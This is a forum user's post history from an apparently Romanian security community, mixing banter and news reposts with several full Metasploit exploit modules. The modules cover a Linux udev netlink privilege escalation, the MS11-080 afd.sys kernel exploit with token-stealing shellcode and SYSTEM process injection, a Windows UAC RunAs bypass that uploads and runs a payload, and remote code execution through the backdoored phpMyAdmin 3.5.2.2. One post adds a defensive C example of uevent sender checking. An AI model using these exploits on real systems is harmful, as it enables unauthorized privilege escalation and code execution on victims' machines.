Nytro
Administrators
Posts: 18725
Days Won: 706

Everything posted by Nytro

  1. Pumba: $acces_list = array(3871, 1, 528, 1348, 22968); Whoever really needs access tells me the reason and we'll see.
  2. Wow, how cool. YES, if you decrypt that string of characters you'll see who the "culprit" is. It's something with "jSoN".
  3. Nytro

    Section

    Not here. If someone else turns up with some very interesting piece of news from other fields, they can post it in Offtopic for example, but we are not making a category for discussions from other fields.
  4. Send a PM to the user "tex" here, describing your passion for manele, and he will help you.
  5. The Pirate Bay has moved to the cloud, by Liviu Petrescu | 18 October 2012. To avoid police raids, the torrent site The Pirate Bay is moving into the cloud. The Swedish pirates are giving up servers completely. This way continuous accessibility is ensured and maintenance costs drop significantly. After a difficult period for The Pirate Bay, with technical problems but also legal problems for the site's founders, the torrents are going into the cloud, CNET writes. Giving up servers in favour of cloud storage ensures The Pirate Bay's uninterrupted activity, because its information will be stored on servers located on several continents, easy to swap. The Pirate Bay's "ascension" into the cloud also hampers any effort to shut the site down, as long as its database is encrypted and hidden across numerous cloud servers. If The Pirate Bay's move is followed by other sites distributing pirated content, the fight against online piracy will become harder. Source: The Pirate Bay s-a mutat in cloud | Hit.ro. Full respect to the guys.
  6. Nytro

    Fun stuff

    http://gifura.orzhk.org/src/1332235315120.swf
  7. The HTTP requests to /pagina.php ?
  8. [h=1]Linux udev Netlink Local Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' #load 'lib/msf/core/post/file.rb' #load 'lib/msf/core/exploit/local/unix.rb' #load 'lib/msf/core/exploit/local/linux.rb' #load 'lib/msf/core/exploit/local/linux_kernel.rb' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Common include Msf::Exploit::Local::LinuxKernel include Msf::Exploit::Local::Linux include Msf::Exploit::Local::Unix def initialize(info={}) super( update_info( info, { 'Name' => 'Linux udev Netlink Local Privilege Escalation', 'Description' => %q{ Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'kcope', # discovery 'Jon Oberheide', # 95-udev-late.rules technique 'egypt' # metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'References' => [ [ 'CVE', '2009-1185' ], [ 'OSVDB', '53810' ], [ 'BID', '34536' ] ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ], #[ 'Command payload', { 'Arch' => ARCH_CMD } ], ], 'DefaultOptons' => { 'WfsDelay' => 2 }, 'DefaultTarget' => 0, 'DisclosureDate' => "", } )) register_options([ OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]), OptInt.new("NetlinkPID", [ false, "Usually udevd pid-1. Meterpreter sessions will autodetect" ]), ], self.class) end def exploit if datastore["NetlinkPID"] and datastore["NetlinkPID"] != 0 netlink_pid = datastore["NetlinkPID"] else print_status("Attempting to autodetect netlink pid...") netlink_pid = autodetect_netlink_pid end if not netlink_pid print_error "Couldn't autodetect netlink PID, try specifying it manually." print_error "Look in /proc/net/netlink for a PID near that of the udevd process" return else print_good "Found netlink pid: #{netlink_pid}" end sc = Metasm::ELF.new(@cpu) sc.parse %Q| #define DEBUGGING #define NULL ((void*)0) #ifdef __ELF__ .section ".bss" rwx .section ".text" rwx .entrypoint #endif call main push eax call exit | # Set up the same include order as the bionic build system. 
# See external/source/meterpreter/source/bionic/libc/Jamfile cparser.lexer.include_search_path = [ "external/source/meterpreter/source/bionic/libc/include/", "external/source/meterpreter/source/bionic/libc/private/", "external/source/meterpreter/source/bionic/libc/bionic/", "external/source/meterpreter/source/bionic/libc/kernel/arch-x86/", "external/source/meterpreter/source/bionic/libc/kernel/common/", "external/source/meterpreter/source/bionic/libc/arch-x86/include/", ] cparser.parse(%Q| #define DEBUGGING // Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h #ifndef __extension__ #define __extension__ #endif // Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h // Doing #if on an undefined macro is fine in GCC, but a parse error in // metasm. #ifndef __STDC__ #define __STDC__ 0 #endif #include <sys/types.h> #include <stdarg.h> #include <stdio.h> #include <unistd.h> #include <errno.h> |) [ "external/source/meterpreter/source/bionic/libc/bionic/__errno.c", "external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c", "external/source/meterpreter/source/bionic/libc/stdio/stdio.c", ].each do |fname| cparser.parse(File.read(fname), fname) end payload_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}" evil_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}" unix_socket_h(sc) linux_x86_syscall_wrappers(sc) main = %Q^ #include <string.h> #include <linux/netlink.h> #define NULL 0 int main() { int sock; struct iovec iov; struct sockaddr_nl sa; struct msghdr msg; char *mp; char message[4096]; memset(sa, 0, sizeof(sa)); sa.nl_family = AF_NETLINK; sa.nl_pid = #{netlink_pid}; sa.nl_groups = 0; memset(&msg, 0x00, sizeof(struct msghdr)); msg.msg_name = (void *)&sa; msg.msg_namelen = sizeof(sa); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = NULL; msg.msg_controllen = 0; msg.msg_flags = 0; sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(sock, (struct sockaddr *) &sa, sizeof(sa)); 
mp = message; mp += sprintf(mp, "remove@/d") + 1; mp += sprintf(mp, "SUBSYSTEM=block") + 1; mp += sprintf(mp, "DEVPATH=/dev/#{Rex::Text.rand_text_alpha(10)}") + 1; mp += sprintf(mp, "TIMEOUT=10") + 1; mp += sprintf(mp, "ACTION=remove") +1; mp += sprintf(mp, "REMOVE_CMD=#{payload_path}") +1; iov.iov_base = (void*)message; iov.iov_len = (int)(mp-message); sendmsg(sock, &msg, 0); close(sock); return 0; } ^ cparser.parse(main, "main.c") asm = cpu.new_ccompiler(cparser, sc).compile sc.parse asm sc.assemble begin elf = sc.encode_string rescue print_error "Metasm Encoding failed: #{$!}" elog "Metasm Encoding failed: #{$!.class} : #{$!}" elog "Call stack:\n#{$!.backtrace.join("\n")}" return end pl = payload.encoded_exe print_status "Writing payload executable (#{pl.length} bytes) to #{payload_path}" write_file(payload_path, pl) print_status "Writing exploit executable (#{elf.length} bytes) to #{evil_path}" write_file(evil_path, elf) print_status "chmod'ing and running it..." cmd_exec("chmod 755 #{evil_path} #{payload_path}") cmd_exec("#{evil_path}") rm_f(evil_path, payload_path) end def autodetect_netlink_pid netlink_pid = nil case session.type when "meterpreter" print_status("Meterpreter session, using get_processes to find netlink pid") process_list = session.sys.process.get_processes udev_proc = process_list.find {|p| p["name"] =~ /udevd/ } udev_pid = udev_proc["pid"] print_status "udev pid: #{udev_pid}" netlink = read_file("/proc/net/netlink") netlink.each_line do |line| pid = line.split(/\s+/)[2].to_i if pid == udev_pid - 1 netlink_pid = pid break end end else print_status("Shell session, trying sh script to find netlink pid") netlink_pid = cmd_exec( %q^ for netlink_pid in $(awk '{print $3}' /proc/net/netlink |sort -u|grep -v -- -); do for udev_pid in $(ps aux | grep [u]devd | awk '{print $2}'); do [ $(( $udev_pid-1 )) = $netlink_pid ] && echo $netlink_pid ; done; done ^) netlink_pid = nil if netlink_pid.empty? 
end netlink_pid end end Source: Linux udev Netlink Local Privilege Escalation
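    Added example (code written for this page, not taken from the module above and not udev's own fix): the check the module description says pre-1.4.1 udev lacked, shown from the listener's side in C. A genuine kernel uevent arrives with sender pid 0 both in the netlink address and in the SO_PASSCRED credentials the kernel attaches; a userland sender gets a non-zero nl_pid on autobind and cannot forge those credentials, so a message assembled the way the module does is parsed but rejected. It assumes a Linux host with kernel headers; `uevent_parse`, `uevent_sender_is_kernel`, `sender_creds` and the sample message are this example's own names and data, and the rule shown is the general idea of the fix, not udev's actual patch.

```c
/* Added example (not from the module above nor udev's own code): a uevent
 * listener with the sender-origin check pre-1.4.1 udev lacked. Linux only. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
/* glibc hides SCM_CREDENTIALS without _GNU_SOURCE; the kernel ABI value is fixed. */
#ifndef SCM_CREDENTIALS
#define SCM_CREDENTIALS 0x02
#endif
#define UEVENT_MAX_PAIRS 32

struct sender_creds { uint32_t pid, uid, gid; };  /* kernel struct ucred layout */

/* "action@devpath" header plus KEY=VALUE pairs; key/val point into the caller's buffer. */
struct uevent { char header[128]; size_t npairs;
                const char *key[UEVENT_MAX_PAIRS], *val[UEVENT_MAX_PAIRS]; };

/* 1 only if the sender address and the kernel-filled SO_PASSCRED credentials both
 * say pid 0, i.e. the kernel. A userland sender gets a non-zero nl_pid on autobind
 * and cannot forge the credentials; no credentials at all means no trust. */
int uevent_sender_is_kernel(uint32_t nl_pid, const struct sender_creds *cred)
{
    return cred != NULL && nl_pid == 0 && cred->pid == 0;
}

/* Parse the NUL-separated payload: returns the number of KEY=VALUE pairs, or -1
 * if malformed (no '@' header, unterminated string, entry without '='). */
int uevent_parse(char *buf, size_t len, struct uevent *ev)
{
    size_t off;
    memset(ev, 0, sizeof(*ev));
    if (len == 0 || memchr(buf, '\0', len) == NULL || strchr(buf, '@') == NULL)
        return -1;
    snprintf(ev->header, sizeof(ev->header), "%s", buf);
    off = strlen(buf) + 1;
    while (off < len && ev->npairs < UEVENT_MAX_PAIRS) {
        char *s = buf + off, *end = memchr(s, '\0', len - off);
        char *eq = end ? strchr(s, '=') : NULL;
        if (end == NULL || eq == NULL || eq == s)
            return -1;
        *eq = '\0';                       /* split KEY=VALUE in place */
        ev->key[ev->npairs] = s;
        ev->val[ev->npairs++] = eq + 1;
        off = (size_t)(end - buf) + 1;
    }
    return (int)ev->npairs;
}

const char *uevent_get(const struct uevent *ev, const char *key)  /* NULL if absent */
{
    for (size_t i = 0; i < ev->npairs; i++)
        if (strcmp(ev->key[i], key) == 0)
            return ev->val[i];
    return NULL;
}

/* Self-check on a constructed message shaped like the module's (sample data, not
 * captured anywhere): 1 when parsing works and only the kernel is trusted. */
int uevent_selfcheck(void)
{
    static const char raw[] = "remove@/d\0SUBSYSTEM=block\0DEVPATH=/dev/example\0"
                              "TIMEOUT=10\0ACTION=remove\0REMOVE_CMD=/tmp/placeholder-path\0";
    char buf[sizeof(raw)];
    struct uevent ev;
    struct sender_creds user = { 4242, 1000, 1000 }, kern = { 0, 0, 0 };
    memcpy(buf, raw, sizeof(raw));
    if (uevent_parse(buf, sizeof(raw) - 1, &ev) != 5) return 0;
    if (strcmp(ev.header, "remove@/d") != 0 || uevent_get(&ev, "REMOVE_CMD") == NULL) return 0;
    if (uevent_sender_is_kernel(4242, &user)) return 0;  /* spoofed message: ignore */
    if (uevent_sender_is_kernel(0, &user)) return 0;     /* forged address, real creds: ignore */
    if (uevent_sender_is_kernel(0, NULL)) return 0;      /* no credentials: ignore */
    return uevent_sender_is_kernel(0, &kern);            /* kernel: act on REMOVE_CMD */
}

/* Stand-alone listener: SO_PASSCRED makes the kernel attach the real sender
 * credentials; receive one uevent and say whether it is trusted (needs root). */
int main(void)
{
    struct sockaddr_nl local = { .nl_family = AF_NETLINK, .nl_groups = 1 }, from;
    struct sender_creds creds, *cp = NULL;
    char buf[4096], cbuf[CMSG_SPACE(sizeof(creds))];
    struct iovec iov = { buf, sizeof(buf) };
    struct msghdr msg = { .msg_name = &from, .msg_namelen = sizeof(from), .msg_iov = &iov,
                          .msg_iovlen = 1, .msg_control = cbuf, .msg_controllen = sizeof(cbuf) };
    struct uevent ev;
    int on = 1, fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    if (fd < 0 || setsockopt(fd, SOL_SOCKET, SO_PASSCRED, &on, sizeof(on)) < 0 ||
        bind(fd, (struct sockaddr *)&local, sizeof(local)) < 0) { perror("netlink setup"); return 1; }
    ssize_t n = recvmsg(fd, &msg, 0);
    if (n < 0) { perror("recvmsg"); return 1; }
    for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c; c = CMSG_NXTHDR(&msg, c))
        if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_CREDENTIALS) {
            memcpy(&creds, CMSG_DATA(c), sizeof(creds));
            cp = &creds;
        }
    if (uevent_parse(buf, (size_t)n, &ev) < 0) { puts("malformed uevent"); return 1; }
    printf("%s from nl_pid %u: %s\n", ev.header, (unsigned)from.nl_pid,
           uevent_sender_is_kernel(from.nl_pid, cp) ? "kernel, trusted" : "userland, ignored");
    close(fd);
    return 0;
}
```

    `uevent_selfcheck()` feeds the parser a buffer laid out like the one the module's C code assembles (header, then NUL-separated KEY=VALUE strings ending in REMOVE_CMD) and confirms it parses but is refused whenever the credentials are not the kernel's; `main` is the live listener, which is where SO_PASSCRED has to be enabled before the first recvmsg or no credentials arrive at all.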
  9. [h=1]MS11-080 AfdJoinLeaf Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking # Average because this module relies on memory corruption within the # kernel, this is inherently dangerous. Also if the payload casues # the system process that it was injected into to die then it's also # possible that the system may become unstable. include Msf::Post::Common include Msf::Post::Windows::Priv def initialize(info={}) super(update_info(info, { 'Name' => 'MS11-080 AfdJoinLeaf Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it's own token to avoid causing system instability. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Matteo Memelli', # original exploit and all the hard work 'Spencer McIntyre' # MSF module ], 'Arch' => [ ARCH_X86 ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Automatic', { } ], [ 'Windows XP SP2 / SP3', { 'HaliQuerySystemInfo' => 0x16bba, 'HalpSetSystemInformation' => 0x19436, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ], [ 'Windows Server 2003 SP2', { 'HaliQuerySystemInfo' => 0x1fa1e, 'HalpSetSystemInformation' => 0x21c60, '_KPROCESS' => "\x38", '_TOKEN' => "\xd8", '_UPID' => "\x94", '_APLINKS' => "\x98" } ], ], 'References' => [ [ 'CVE', '2011-2005' ], [ 'MSB', 'MS11-080' ], [ 'EDB', 18176 ], [ 'URL', 'http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/' ] ], 'DisclosureDate'=> 'Nov 30 2011', 'DefaultTarget' => 0 })) register_options([ ]) end def find_sys_base(drvname) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]]) session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]]) results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*") addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) current_drvname = results['lpBaseName'][0..results['return'] - 1] if drvname == nil if current_drvname.downcase.include?('krnl') return [address, current_drvname] end elsif drvname == results['lpBaseName'][0..results['return'] - 1] return [address, current_drvname] end end end # Function borrowed from smart_hashdump def get_system_proc # Make sure you got the 
correct SYSTEM Account Name no matter the OS Language local_sys = resolve_sid("S-1-5-18") system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}" # Processes that can Blue Screen a host if migrated in to dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"] session.sys.process.processes.each do |p| # Check we are not migrating to a process that can BSOD the host next if dangerous_processes.include?(p["name"]) next if p["pid"] == session.sys.process.getpid next if p["pid"] == 4 next if p["user"] != system_account_name return p end end def exploit if sysinfo["Architecture"] =~ /wow64/i print_error("Running against WOW64 is not supported") return elsif sysinfo["Architectore"] =~ /x64/ print_error("Running against 64-bit systems is not supported") return end mytarget = target if mytarget.name =~ /Automatic/ os = sysinfo["OS"] if os =~ /windows xp/i mytarget = targets[1] end if ((os =~ /2003/) and (os =~ /service pack 2/i)) mytarget = targets[2] end if ((os =~ /\.net server/i) and (os =~ /service pack 2/i)) mytarget = targets[2] end if mytarget.name =~ /Automatic/ print_error("Could not identify the target system, it may not be supported") return end print_status("Running against #{mytarget.name}") end if is_system? 
print_error("This meterpreter session is already running as SYSTEM") return end this_proc = session.sys.process.open kernel_info = find_sys_base(nil) base_addr = 0x1001 print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}") result = session.railgun.ws2_32.WSASocketA("AF_INET", "SOCK_STREAM", "IPPROTO_TCP", nil, nil, 0) socket = result['return'] irpstuff = rand_text_alpha(8) irpstuff << "\x00\x00\x00\x00" irpstuff << rand_text_alpha(4) irpstuff << "\x01\x00\x00\x00" irpstuff << "\xe8\x00" + "4" + "\xf0\x00" irpstuff << rand_text_alpha(231) if not this_proc.memory.writable?(0x1000) session.railgun.add_function( 'ntdll', 'NtAllocateVirtualMemory', 'DWORD', [ ["DWORD", "ProcessHandle", "in"], ["PBLOB", "BaseAddress", "inout"], ["PDWORD", "ZeroBits", "in"], ["PBLOB", "RegionSize", "inout"], ["DWORD", "AllocationType", "in"], ["DWORD", "Protect", "in"] ]) result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end if not this_proc.memory.writable?(0x1000) print_error('Failed to properly allocate memory') return end this_proc.memory.write(0x1000, irpstuff) hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) hKernel = hKernel['return'] halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable") halDispatchTable = halDispatchTable['return'] halDispatchTable -= hKernel halDispatchTable += kernel_info[0] print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") halbase = find_sys_base("hal.dll")[0] haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo'] halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation'] print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}") print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}") #### Exploitation #### shellcode_address_dep = 0x0002071e 
shellcode_address_nodep = 0x000207b8 padding = make_nops(2) halDispatchTable0x4 = halDispatchTable + 0x4 halDispatchTable0x8 = halDispatchTable + 0x8 restore_ptrs = "\x31\xc0" restore_ptrs << "\xb8" + [ halpSetSystemInformation ].pack("L") restore_ptrs << "\xa3" + [ halDispatchTable0x8 ].pack("L") restore_ptrs << "\xb8" + [ haliQuerySystemInformation ].pack("L") restore_ptrs << "\xa3" + [ halDispatchTable0x4 ].pack("L") tokenstealing = "\x52" tokenstealing << "\x53" tokenstealing << "\x33\xc0" tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" tokenstealing << "\x8b\x40" + mytarget['_KPROCESS'] tokenstealing << "\x8b\xc8" tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x89\x1d\x00\x09\x02\x00" tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00" tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00" tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" tokenstealing << "\x75\xe8" tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x8b\xc1" tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x5b" tokenstealing << "\x5a" tokenstealing << "\xc2\x10" restore_token = "\x52" restore_token << "\x33\xc0" restore_token << "\x64\x8b\x80\x24\x01\x00\x00" restore_token << "\x8b\x40" + mytarget['_KPROCESS'] restore_token << "\x8b\x15\x00\x09\x02\x00" restore_token << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" restore_token << "\x5a" restore_token << "\xc2\x10" shellcode = padding + restore_ptrs + tokenstealing this_proc.memory.write(shellcode_address_dep, shellcode) this_proc.memory.write(shellcode_address_nodep, shellcode) this_proc.memory.protect(0x00020000) addr = [ 2, 4455, 0x7f000001, 0, 0 ].pack("s!S!L!L!L!") result = session.railgun.ws2_32.connect(socket, addr, addr.length) if result['return'] != 0xffffffff print_error("The socket is not in the correct state") return end session.railgun.add_function( 'ntdll', 
'NtDeviceIoControlFile', 'DWORD', [ [ "DWORD", "FileHandle", "in" ], [ "DWORD", "Event", "in" ], [ "DWORD", "ApcRoutine", "in" ], [ "DWORD", "ApcContext", "in" ], [ "PDWORD", "IoStatusBlock", "out" ], [ "DWORD", "IoControlCode", "in" ], [ "LPVOID", "InputBuffer", "in" ], [ "DWORD", "InputBufferLength", "in" ], [ "LPVOID", "OutputBuffer", "in" ], [ "DWORD", "OutPutBufferLength", "in" ] ]) session.railgun.add_function( 'ntdll', 'NtQueryIntervalProfile', 'DWORD', [ [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] ]) print_status("Triggering AFDJoinLeaf pointer overwrite...") result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) if not is_system? print_error("Exploit failed") return end begin proc = get_system_proc print_status("Injecting the payload into SYSTEM process: #{proc["name"]} PID: #{proc["pid"]}") host_process = client.sys.process.open(proc["pid"], PROCESS_ALL_ACCESS) mem = host_process.memory.allocate(payload.encoded.length + (payload.encoded.length % 1024)) print_status("Writing #{payload.encoded.length} bytes at address #{"0x%.8x" % mem}") host_process.memory.write(mem, payload.encoded) host_process.thread.create(mem, 0) rescue ::Exception => e print_error("Failed to Inject Payload") print_error(e.to_s) end # Restore the token because apparently BSODs are frowned upon print_status("Restoring the original token...") shellcode = padding + restore_ptrs + restore_token this_proc.memory.write(shellcode_address_dep, shellcode) this_proc.memory.write(shellcode_address_nodep, shellcode) result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) end end Sursa: MS11-080 AfdJoinLeaf Privilege Escalation
  10. Windows Escalate UAC Execute RunAs

    ##
    # $Id$
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Local
      Rank = ExcellentRanking

      include Post::Common
      include Exploit::EXE
      include Post::File

      def initialize(info={})
        super( update_info( info,
          'Name'          => 'Windows Escalate UAC Execute RunAs',
          'Description'   => %q{
            This module will attempt to elevate execution level using
            the ShellExecute undocumented RunAs flag to bypass low UAC settings.
          },
          'License'       => MSF_LICENSE,
          'Author'        =>
            [
              'mubix <mubix[at]hak5.org>' # Port to local exploit
            ],
          'Version'       => '$Revision$',
          'Platform'      => [ 'windows' ],
          'SessionTypes'  => [ 'meterpreter' ],
          'Targets'       => [ [ 'Windows', {} ] ],
          'DefaultTarget' => 0,
          'References'    =>
            [
              [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
            ],
          'DisclosureDate'=> "Jan 3, 2012"
        ))

        register_options([
          OptString.new("FILENAME", [ false, "File name on disk"]),
          OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
          OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
        ])
      end

      def exploit
        root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
        open_key = session.sys.registry.open_key(root_key, base_key)
        lua_setting = open_key.query_value('EnableLUA')

        if lua_setting.data == 1
          print_status "UAC is Enabled, checking level..."
        else
          print_good "UAC is not enabled, no prompt for the user"
        end

        uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')

        case uac_level.data
        when 2
          print_status "UAC is set to 'Always Notify'"
          print_status "The user will be prompted, wait for them to click 'Ok'"
        when 5
          print_debug "UAC is set to Default"
          print_debug "The user will be prompted, wait for them to click 'Ok'"
        when 0
          print_good "UAC is not enabled, no prompt for the user"
        end

        #
        # Generate payload and random names for upload
        #
        payload = generate_payload_exe

        if datastore["FILENAME"]
          payload_filename = datastore["FILENAME"]
        else
          payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
        end

        if datastore["PATH"]
          payload_path = datastore["PATH"]
        else
          payload_path = session.fs.file.expand_path("%TEMP%")
        end

        cmd_location = "#{payload_path}\\#{payload_filename}"

        if datastore["UPLOAD"]
          print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
          fd = session.fs.file.new(cmd_location, "wb")
          fd.write(payload)
          fd.close
        end

        session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
      end
    end

    Source: Windows Escalate UAC Execute RunAs + http://www.exploit-db.com/exploits/21845/
  11. phpMyAdmin 3.5.2.2 server_sync.php Backdoor

    ##
    # $Id$
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::Tcp
      include Msf::Exploit::Remote::HttpClient

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
          'Description'    => %q{
            This module exploits an arbitrary code execution backdoor
            placed into phpMyAdmin v3.5.2.2 through a compromised
            SourceForge mirror.
          },
          'Author'         => [ 'hdm' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision$',
          'References'     =>
            [
              ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php']
            ],
          'Privileged'     => false,
          'Payload'        =>
            {
              'DisableNops' => true,
              'Compat'      =>
                {
                  'ConnectionType' => 'find',
                },
              # Arbitrary big number. The payload gets sent as an HTTP
              # response body, so really it's unlimited
              'Space'       => 262144, # 256k
            },
          'DefaultOptions' => { 'WfsDelay' => 30 },
          'DisclosureDate' => 'Sep 25 2012',
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        => [[ 'Automatic', { }]],
          'DefaultTarget'  => 0))

        register_options([
          OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin'])
        ], self.class)
      end

      def exploit
        uris = []
        tpath = datastore['PATH']
        if tpath[-1,1] == '/'
          tpath = tpath.chop
        end

        pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%")

        res = send_request_raw(
          {
            'global'  => true,
            'uri'     => tpath + "/server_sync.php",
            'method'  => 'POST',
            'data'    => pdata,
            'headers' =>
              {
                'Content-Type'   => 'application/x-www-form-urlencoded',
                'Content-Length' => pdata.length,
              }
          }, 1.0)

        handler
      end
    end

    Source: phpMyAdmin 3.5.2.2 server_sync.php Backdoor
  12. Microsoft Internet Explorer execCommand Use-After-Free Vulnerability. Metasploit module. Download: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/aac41e91fd38f99238971892d61ead4cfbedabb4/entry/modules/exploits/windows/browser/ie_execcommand_uaf.rb
  13. Come on, nothing is free. Although you don't pay money for the services you use, you pay with personal information, interests... things that through "business intelligence" become profitable for Google: ads, statistics...
  14. Fuck you, you're scaring the young ones.
  15. https://www.youtube.com/watch?v=fMhgTVlKoTk&feature=related
  16. I didn't get a warning :">
  17. The amount of stupid posts is too damn high...
  18. Nytro

    Hackathon Romania

    "The organizer has the right to publish, promote and use in marketing campaigns the applications developed by contestants at the event, the contestants giving their express consent in this regard by registering for the event. Publication, promotion and use of the applications developed during the event is done by the organizer without any obligation to remunerate the participants in any way. The organizer has the right to publish the contents of the applications developed, as well as the names of the people who developed those applications." I might show up there.
  19. Overview of VoIP and Voice Over IP Concepts, October 10, 2012. Streamed live on Oct 10, 2012 by elithecomputerguy. In this Daily Blob Eli the Computer Guy talks about VoIP and how it works. YouTube:
  20. Windows 8: FUD* for thought
    *Fear, Uncertainty, Doubt
    Aryeh Goretsky, MVP, ZCSE

    Table of contents
    Introduction
    Defender of the faith
    Giving rootkits the boot
    Nuts and bolts
    Microsoft draws a line in the silicon
    Sending criminals on the ELAM
    To mend and defend
    The evolution of evil
    Attacking Windows 8
